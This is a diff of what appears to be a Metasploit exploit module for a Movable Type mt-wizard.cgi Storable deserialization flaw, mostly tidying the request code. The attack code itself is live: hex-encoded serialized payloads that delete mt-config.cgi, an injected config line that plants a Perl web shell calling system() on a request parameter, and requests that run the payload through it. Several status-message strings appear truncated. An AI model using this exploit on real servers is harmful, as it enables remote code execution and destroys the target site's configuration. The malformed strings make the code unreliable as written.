@@ -41,16 +41,16 @@ def initialize(info = {})
4141 {
4242 'PayloadType' => 'cmd'
4343 } ,
44- 'Platform' => [ 'unix' , 'linux' ] ,
44+ 'Platform' => [ 'unix' ] ,
4545 'Arch' => ARCH_CMD ,
46- 'Targets' => [ [ 'Automatic' , { } ] ] ,
46+ 'Targets' => [ [ 'Automatic' , { } ] ] ,
4747 'DisclosureDate' => 'Feb 11 2015' ,
4848 'DefaultTarget' => 0 ) )
4949
5050 register_options (
5151 [
52- OptString . new ( 'TARGETURI' , [ true , " MoveableType cgi-bin directory path" , " /cgi-bin/movabletype/" ] ) ,
53- OptBool . new ( 'DESTRUCTIVE' , [ false , 'Use destructive attack method (more likely to succeed, but corrupts target system.)' , false ] ) ,
52+ OptString . new ( 'TARGETURI' , [ true , ' MoveableType cgi-bin directory path' , ' /cgi-bin/mt/' ] ) ,
53+ OptBool . new ( 'DESTRUCTIVE' , [ true , 'Use destructive attack method (more likely to succeed, but corrupts target system.)' , false ] )
5454 ] , self . class
5555 )
5656
@@ -101,7 +101,8 @@ def check
101101 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
102102 }
103103 } )
104- if !res || res . code != 200 || !res . body . include? ( "Can't locate XXXCHECKXXX.pm" )
104+
105+ unless res && res . code == 200 && res . body . include? ( "Can't locate XXXCHECKXXX.pm" )
105106 vprint_status ( "#{ peer } ) ;
106107 return Exploit ::CheckCode ::Safe
107108 end
@@ -110,9 +111,9 @@ def check
110111
111112 def exploit
112113 if datastore [ 'DESTRUCTIVE' ] == true
113- return exploit_destructive ( )
114+ exploit_destructive
114115 else
115- return exploit_nondestructive ( )
116+ exploit_nondestructive
116117 end
117118 end
118119
@@ -166,21 +167,15 @@ def exploit_nondestructive
166167
167168 print_status ( "#{ peer } #{ payload . raw . length } )
168169
169- res = send_request_cgi ( {
170- 'method' => 'GET' ,
171- 'uri' => normalize_uri ( target_uri . path , 'mt-wizard.cgi' ) ,
172- 'vars_get' => {
173- '__mode' => 'retry' ,
174- 'step' => 'configure' ,
175- 'config' => config_payload
176- }
177- } )
178-
179- if res && res . code == 200
180- print_status ( "Successfully sent exploit request" )
181- else
182- fail_with ( Failure ::Unknown , "Error sending exploit request" )
183- end
170+ send_request_cgi ( {
171+ 'method' => 'GET' ,
172+ 'uri' => normalize_uri ( target_uri . path , 'mt-wizard.cgi' ) ,
173+ 'vars_get' => {
174+ '__mode' => 'retry' ,
175+ 'step' => 'configure' ,
176+ 'config' => config_payload
177+ }
178+ } , 5 )
184179 end
185180
186181=begin
@@ -207,19 +202,19 @@ def exploit_nondestructive
207202
208203 def exploit_destructive
209204 print_status ( "#{ peer } )
210- # First we need to delte mt-config.cgi using the storable injection
205+ # First we need to delete mt-config.cgi using the storable injection
211206
212207 print_status ( "#{ peer } )
213208
214209 res = send_request_cgi ( {
215- 'method' => 'GET' ,
216- 'uri' => normalize_uri ( target_uri . path , 'mt-wizard.cgi' ) ,
217- 'vars_get' => {
218- '__mode' => 'retry' ,
219- 'step' => 'configure' ,
220- 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
221- }
222- } )
210+ 'method' => 'GET' ,
211+ 'uri' => normalize_uri ( target_uri . path , 'mt-wizard.cgi' ) ,
212+ 'vars_get' => {
213+ '__mode' => 'retry' ,
214+ 'step' => 'configure' ,
215+ 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
216+ }
217+ } )
223218
224219 if res && res . code == 200
225220 print_status ( "Successfully sent unlink request" )
@@ -232,17 +227,17 @@ def exploit_destructive
232227 print_status ( "#{ peer } )
233228
234229 res = send_request_cgi ( {
235- 'method' => 'GET' ,
236- 'uri' => normalize_uri ( target_uri . path , 'mt-wizard.cgi' ) ,
237- 'vars_get' => {
238- '__mode' => 'next_step' ,
239- 'step' => 'optional' ,
240- 'default_language' => 'en_us' ,
241- 'email_address_main' => "x\n ObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\ n\\ n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1" ,
242- 'set_static_uri_to' => '/' ,
243- 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f' , # equivalent to 'set_static_file_to' => '/',
244- }
245- } )
230+ 'method' => 'GET' ,
231+ 'uri' => normalize_uri ( target_uri . path , 'mt-wizard.cgi' ) ,
232+ 'vars_get' => {
233+ '__mode' => 'next_step' ,
234+ 'step' => 'optional' ,
235+ 'default_language' => 'en_us' ,
236+ 'email_address_main' => "x\n ObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\ n\\ n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1" ,
237+ 'set_static_uri_to' => '/' ,
238+ 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f' , # equivalent to 'set_static_file_to' => '/',
239+ }
240+ } )
246241
247242 if res && res . code == 200
248243 print_status ( "Successfully sent mt-config rewrite request" )
@@ -254,19 +249,13 @@ def exploit_destructive
254249
255250 print_status ( "#{ peer } )
256251
257- res = send_request_cgi ( {
258- 'method' => 'GET' ,
259- 'uri' => normalize_uri ( target_uri . path , 'mt.cgi' ) ,
260- 'vars_get' => {
261- 'xyzzy' => payload . encoded ,
262- }
263- } )
264-
265- if res && res . code == 200
266- print_status ( "Successfully sent payload request" )
267- else
268- fail_with ( Failure ::Unknown , "Error sending payload request" )
269- end
252+ send_request_cgi ( {
253+ 'method' => 'GET' ,
254+ 'uri' => normalize_uri ( target_uri . path , 'mt.cgi' ) ,
255+ 'vars_get' => {
256+ 'xyzzy' => payload . encoded ,
257+ }
258+ } , 5 )
270259 end
271260
272261end
0 commit comments